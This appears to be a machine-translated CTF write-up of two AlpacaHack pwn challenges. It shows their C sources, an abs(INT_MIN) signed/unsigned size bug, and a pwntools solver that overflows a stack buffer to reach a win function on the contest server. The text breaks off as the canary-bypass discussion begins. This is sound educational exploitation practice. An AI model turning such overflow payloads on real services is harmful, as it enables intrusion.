{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-alpaca-round1-pwn-en","result":{"data":{"markdownRemark":{"id":"fad0b992-f3d9-5466-8307-3c027d154408","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-alpaca-round1-pwn\">original page</a>.</p>\n</blockquote>\n<p>I finally wrote the long-postponed writeup for AlpacaHack Round 1 (Pwn).</p>\n<p>I ran out of energy, so I will cover the remaining two challenges another time.</p>\n<p>Reference: <a href=\"https://alpacahack.com/ctfs/round-1/challenges\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Challenges - AlpacaHack Round 1 (Pwn)</a></p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#echopwn\">echo(Pwn)</a></li>\n<li>\n<p><a href=\"#hexechopwn\">hexecho(Pwn)</a></p>\n<ul>\n<li><a href=\"#scanf-specifications-and-how-to-exploit-them\">scanf Specifications and How to Exploit Them</a></li>\n<li><a href=\"#bypassing-the-canary\">Bypassing the Canary</a></li>\n<li><a href=\"#leaking-libc\">Leaking libc</a></li>\n<li><a href=\"#exploit\">Exploit</a></li>\n</ul>\n</li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"echopwn\" style=\"position:relative;\"><a href=\"#echopwn\" aria-label=\"echopwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" 
height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>echo(Pwn)</h2>\n<blockquote>\n<p>A service for reachability check.</p>\n</blockquote>\n<p>The challenge provided C source code and an executable binary.</p>\n<p>First, I checked the binary’s protection mechanisms.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 665px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/3f198929963501550d07e2ee2f8afa90/5f4af/image-20240818120620924.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 20.833333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAqklEQVQY05WN2w6CMBBEt7QYMXgBiRChpS1y1cj/f9244oOJPhgfTmYz2Zmhk0lR2ATdrFF3ObTXsO2EuunRjDOMb+HaAfbSv2/mqc47aFMh3sYLURSBBAXwroE1DsT30Fa4DRW8yXAfCxzTHQJBCJVEGEooFUDJF1JKztAH/DxdR1hXL4beE/yBYFhtTNh/BX4ghEBZnnlZLUayFkg3hIzLch4r2Fv9UfgAjYlcM67eDTAAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/3f198929963501550d07e2ee2f8afa90/8ac56/image-20240818120620924.webp 240w,\n/static/3f198929963501550d07e2ee2f8afa90/d3be9/image-20240818120620924.webp 480w,\n/static/3f198929963501550d07e2ee2f8afa90/ced6d/image-20240818120620924.webp 665w\"\n              sizes=\"(max-width: 665px) 100vw, 
665px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/3f198929963501550d07e2ee2f8afa90/8ff5a/image-20240818120620924.png 240w,\n/static/3f198929963501550d07e2ee2f8afa90/e85cb/image-20240818120620924.png 480w,\n/static/3f198929963501550d07e2ee2f8afa90/5f4af/image-20240818120620924.png 665w\"\n            sizes=\"(max-width: 665px) 100vw, 665px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/3f198929963501550d07e2ee2f8afa90/5f4af/image-20240818120620924.png\"\n            alt=\"image-20240818120620924\"\n            title=\"image-20240818120620924\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Next, I looked at the provided source code.</p>\n<p>Since PIE is disabled, it looks like a simple buffer overflow into the <code class=\"language-text\">win</code> function should give the flag, but the <code class=\"language-text\">get_size</code> function validates the input size, so the overflow cannot be exploited so easily.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdio.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdlib.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n\n<span class=\"token macro property\"><span class=\"token 
directive-hash\">#</span><span class=\"token directive keyword\">define</span> <span class=\"token macro-name\">BUF_SIZE</span> <span class=\"token expression\"><span class=\"token number\">0x100</span></span></span>\n\n<span class=\"token comment\">/* Call this function! */</span>\n<span class=\"token keyword\">void</span> <span class=\"token function\">win</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>args<span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span><span class=\"token string\">\"/bin/cat\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"/flag.txt\"</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">execve</span><span class=\"token punctuation\">(</span>args<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> args<span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">get_size</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token comment\">// 
Input size</span>\n  <span class=\"token keyword\">int</span> size <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">scanf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"%d%*c\"</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">&amp;</span>size<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n  <span class=\"token comment\">// Validate size</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>size <span class=\"token operator\">=</span> <span class=\"token function\">abs</span><span class=\"token punctuation\">(</span>size<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">></span> BUF_SIZE<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[-] Invalid size\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n\n  <span class=\"token keyword\">return</span> size<span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">get_data</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>buf<span class=\"token punctuation\">,</span> <span class=\"token keyword\">unsigned</span> size<span class=\"token 
punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">unsigned</span> i<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">char</span> c<span class=\"token punctuation\">;</span>\n\n  <span class=\"token comment\">// Input data until newline</span>\n  <span class=\"token keyword\">for</span> <span class=\"token punctuation\">(</span>i <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span> i <span class=\"token operator\">&lt;</span> size<span class=\"token punctuation\">;</span> i<span class=\"token operator\">++</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">fread</span><span class=\"token punctuation\">(</span><span class=\"token operator\">&amp;</span>c<span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">stdin</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">!=</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">break</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>c <span class=\"token operator\">==</span> <span class=\"token char\">'\\n'</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">break</span><span class=\"token punctuation\">;</span>\n    buf<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> c<span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  buf<span 
class=\"token punctuation\">[</span>i<span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token char\">'\\0'</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">echo</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">int</span> size<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">char</span> buf<span class=\"token punctuation\">[</span>BUF_SIZE<span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n\n  <span class=\"token comment\">// Input size</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Size: \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  size <span class=\"token operator\">=</span> <span class=\"token function\">get_size</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n  <span class=\"token comment\">// Input data</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Data: \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">get_data</span><span class=\"token punctuation\">(</span>buf<span class=\"token punctuation\">,</span> size<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n  <span class=\"token comment\">// Show data</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Received: %s\\n\"</span><span class=\"token punctuation\">,</span> buf<span class=\"token 
punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token function\">setbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">setbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdout</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">echo</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>While looking for a way to bypass the <code class=\"language-text\">abs</code> call in <code class=\"language-text\">get_size</code>, I found that, as shown below, it cannot correctly compute the absolute value when given signed <code class=\"language-text\">INT_MIN</code>.</p>\n<p>Reference: <a href=\"https://stackoverflow.com/questions/11243014/why-is-absint-min-still-2147483648\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">c - Why is abs(INT_MIN) still -2147483648? 
- Stack Overflow</a></p>\n<p>In <code class=\"language-text\">get_data</code>, however, the size is treated as an unsigned int rather than an int, so by supplying signed <code class=\"language-text\">INT_MIN</code> (<code class=\"language-text\">-2147483648</code>) as input, it becomes possible to push more than 0x100 bytes of data onto the stack.</p>\n<p>I ultimately obtained the flag with the following solver.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\ncontext<span class=\"token punctuation\">.</span>arch <span class=\"token operator\">=</span> <span class=\"token string\">\"amd64\"</span>\ncontext<span class=\"token punctuation\">.</span>endian <span class=\"token operator\">=</span> <span class=\"token string\">\"little\"</span>\n\n<span class=\"token comment\"># Set target</span>\nTARGET_PATH <span class=\"token operator\">=</span> <span class=\"token string\">\"./echo\"</span>\nexe <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">)</span>\n\ntarget <span class=\"token operator\">=</span> remote<span class=\"token punctuation\">(</span><span class=\"token string\">\"34.170.146.252\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">17360</span><span class=\"token punctuation\">,</span> ssl<span class=\"token operator\">=</span><span class=\"token boolean\">False</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Exploit</span>\n<span class=\"token comment\"># https://stackoverflow.com/questions/11243014/why-is-absint-min-still-2147483648</span>\ntarget<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"Size: \"</span><span class=\"token 
punctuation\">)</span>\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"-2147483648\"</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\ntarget<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"Data: \"</span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">=</span> flat<span class=\"token punctuation\">(</span>\n    <span class=\"token string\">b\"A\"</span><span class=\"token operator\">*</span><span class=\"token number\">0x110</span><span class=\"token punctuation\">,</span>\n    <span class=\"token string\">b\"B\"</span><span class=\"token operator\">*</span><span class=\"token number\">8</span><span class=\"token punctuation\">,</span>\n    <span class=\"token number\">0x4011f6</span>\n<span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Finish exploit</span>\ntarget<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>clean<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>This confirmed that the correct flag was <code class=\"language-text\">Alpaca{s1Gn3d_4Nd_uNs1gn3d_s1zEs_c4n_cAu5e_s3ri0us_buGz}</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/c3be38ab21caf369ac0f891ba3056a46/d004c/image-20240818132225642.png\"\n    style=\"display: block\"\n    
target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 17.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAh0lEQVQY05XPyQrCMBAG4HiaLB7SJTvYJgUVpe37P92vjeJBUPTw8c/CHIblEnE8TbAhoXfxKaDrO6i9AhGBMfa7lhgOagf5z9E3yzpjXWZcL2eUqSDnseYwDvDBP/g3deYQY6hpjIGxBtZZsJQiwn3RtA201iBO9c0tueCfcQ4pJYQQr36rb+iMW5i5mqqxAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/c3be38ab21caf369ac0f891ba3056a46/8ac56/image-20240818132225642.webp 240w,\n/static/c3be38ab21caf369ac0f891ba3056a46/d3be9/image-20240818132225642.webp 480w,\n/static/c3be38ab21caf369ac0f891ba3056a46/e46b2/image-20240818132225642.webp 960w,\n/static/c3be38ab21caf369ac0f891ba3056a46/f992d/image-20240818132225642.webp 1440w,\n/static/c3be38ab21caf369ac0f891ba3056a46/6eb7d/image-20240818132225642.webp 1611w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/c3be38ab21caf369ac0f891ba3056a46/8ff5a/image-20240818132225642.png 240w,\n/static/c3be38ab21caf369ac0f891ba3056a46/e85cb/image-20240818132225642.png 480w,\n/static/c3be38ab21caf369ac0f891ba3056a46/d9199/image-20240818132225642.png 960w,\n/static/c3be38ab21caf369ac0f891ba3056a46/07a9c/image-20240818132225642.png 1440w,\n/static/c3be38ab21caf369ac0f891ba3056a46/d004c/image-20240818132225642.png 1611w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/c3be38ab21caf369ac0f891ba3056a46/d9199/image-20240818132225642.png\"\n            alt=\"image-20240818132225642\"\n            title=\"image-20240818132225642\"\n            loading=\"lazy\"\n            
style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"hexechopwn\" style=\"position:relative;\"><a href=\"#hexechopwn\" aria-label=\"hexechopwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>hexecho(Pwn)</h2>\n<blockquote>\n<p>Stack canary makes me feel more secure.</p>\n</blockquote>\n<p>As in the previous challenge, an executable binary and source code were provided.</p>\n<p>This time, however, stack canaries appear to be enabled in the binary.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 778px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/87d9b2e3ffa16c64c515da7829efb0fa/20982/image-20240818133017795.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 18.75%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAArUlEQVQY042M2w6CMBBEVzDa4o0UoV4QSgURjf//eceqD8b4oA8nOzuzs1L2Kc2toB5y7L6k6q5U7ZVd3eK6C6XvORzP1EE/eOhXNuCahv58wm4sWWbI8zXiG0+RW1aLBbfB07odQ1fiKkuiNVpNmc8SkkSHXT2nCp4OWqkXIvLm1HcYY5BYKNyIdCtkByHW8nn4L8fWE8VjJuHhZilszYj9TKhDuPxRjqLoy7sDSpZdBpMu9XgAAAAASUVORK5CYII='); background-size: cover; display: 
block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/87d9b2e3ffa16c64c515da7829efb0fa/8ac56/image-20240818133017795.webp 240w,\n/static/87d9b2e3ffa16c64c515da7829efb0fa/d3be9/image-20240818133017795.webp 480w,\n/static/87d9b2e3ffa16c64c515da7829efb0fa/10884/image-20240818133017795.webp 778w\"\n              sizes=\"(max-width: 778px) 100vw, 778px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/87d9b2e3ffa16c64c515da7829efb0fa/8ff5a/image-20240818133017795.png 240w,\n/static/87d9b2e3ffa16c64c515da7829efb0fa/e85cb/image-20240818133017795.png 480w,\n/static/87d9b2e3ffa16c64c515da7829efb0fa/20982/image-20240818133017795.png 778w\"\n            sizes=\"(max-width: 778px) 100vw, 778px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/87d9b2e3ffa16c64c515da7829efb0fa/20982/image-20240818133017795.png\"\n            alt=\"image-20240818133017795\"\n            title=\"image-20240818133017795\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>To solve the challenge, I examined the following source code.</p>\n<p>It is not very different from the previous challenge, but the size validation has been removed and the input is read in hexadecimal.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdio.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdlib.h></span></span>\n<span class=\"token 
macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">define</span> <span class=\"token macro-name\">BUF_SIZE</span> <span class=\"token expression\"><span class=\"token number\">0x100</span></span></span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">get_size</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">int</span> size <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">scanf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"%d%*c\"</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">&amp;</span>size<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">return</span> size<span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">get_hex</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>buf<span class=\"token punctuation\">,</span> <span class=\"token keyword\">unsigned</span> size<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">for</span> <span class=\"token punctuation\">(</span><span class=\"token keyword\">unsigned</span> i <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span> i <span class=\"token operator\">&lt;</span> size<span 
class=\"token punctuation\">;</span> i<span class=\"token operator\">++</span><span class=\"token punctuation\">)</span>\n    <span class=\"token function\">scanf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"%02hhx\"</span><span class=\"token punctuation\">,</span> buf <span class=\"token operator\">+</span> i<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">hexecho</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">int</span> size<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">char</span> buf<span class=\"token punctuation\">[</span>BUF_SIZE<span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n\n  <span class=\"token comment\">// Input size</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Size: \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  size <span class=\"token operator\">=</span> <span class=\"token function\">get_size</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n  <span class=\"token comment\">// Input data</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Data (hex): \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">get_hex</span><span class=\"token punctuation\">(</span>buf<span class=\"token punctuation\">,</span> size<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n  <span class=\"token 
comment\">// Show data</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Received: \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">for</span> <span class=\"token punctuation\">(</span><span class=\"token keyword\">int</span> i <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span> i <span class=\"token operator\">&lt;</span> size<span class=\"token punctuation\">;</span> i<span class=\"token operator\">++</span><span class=\"token punctuation\">)</span>\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"%02hhx \"</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">(</span><span class=\"token keyword\">unsigned</span> <span class=\"token keyword\">char</span><span class=\"token punctuation\">)</span>buf<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">putchar</span><span class=\"token punctuation\">(</span><span class=\"token char\">'\\n'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token function\">setbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span 
class=\"token function\">setbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdout</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">hexecho</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Since there is no size validation, exploiting the buffer overflow itself is easy, but we still need to bypass the canary.</p>\n<p>At first, however, I could not find a way to exploit the buffer overflow without either leaking or corrupting the canary.</p>\n<p>Reading the official writeup, I learned that the key point is that the return value of <code class=\"language-text\">scanf(\"%02hhx\", buf + i);</code> is never checked.</p>\n<p>Reference: <a href=\"https://ptr-yudai.hatenablog.com/entry/2024/08/19/035647\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Writeup for AlpacaHack Round 1 (Pwn) - Let’s Do CTF</a></p>\n<h3 id=\"scanf-specifications-and-how-to-exploit-them\" style=\"position:relative;\"><a href=\"#scanf-specifications-and-how-to-exploit-them\" aria-label=\"scanf specifications and how to exploit them permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" 